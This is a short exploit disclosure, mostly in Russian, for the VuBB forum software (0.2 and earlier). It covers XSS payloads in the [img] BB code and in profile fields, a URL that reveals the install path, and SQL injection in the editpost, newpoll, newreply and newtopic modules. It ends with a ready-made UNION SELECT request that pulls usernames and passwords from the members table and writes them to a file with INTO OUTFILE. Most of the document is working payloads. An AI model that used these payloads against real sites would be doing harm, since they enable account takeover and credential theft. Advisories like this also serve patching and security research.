Script : VuBB

Version : <= 0.2

Site : http://vubb.com/

Bug : SQL-injection, XSS, Install folder show, Web shell

Date : 03-03-2006

1) XSS

баг в бб коде [img]

пример использования

[img]java script:ale rt()[/img] (где пробел это TAB)

XSS в usercp

поле Website не фильтруется

пример : javascript:alert(%22ok%22)

поля Location,AIM,MSN,Yahoo не фильтруются

пример : <script>alert('E133Team')</script>

2) PATH
расскрытие установоного пути
?act=usercp&view=e1it3%20team

note : error_reporting != 0 

3) SQL-injection
magic_quotes_gpc == off

уязвимые скрипты:
modules/editpost.php
modules/newpool.php
modules/newreplay.php
modules/newtopic.php

ошибки с строчках 6 и 17

баги выглядят:
index.php?act=editpost&t=topic_id&f='&ist=1
?act=newpoll&f='
?act=newreply&t=topic_id&f='
?act=newtopic&f='

используем:
?act=editpost&t=2&f='%20UNION%20SELECT%20%20%60user%60,%20%60pass%60%20FROM%20%60members%60%20WHERE%20id='1'%20INTO%20OUTFILE%20'/part/to/write/log.txt'/*&ist=1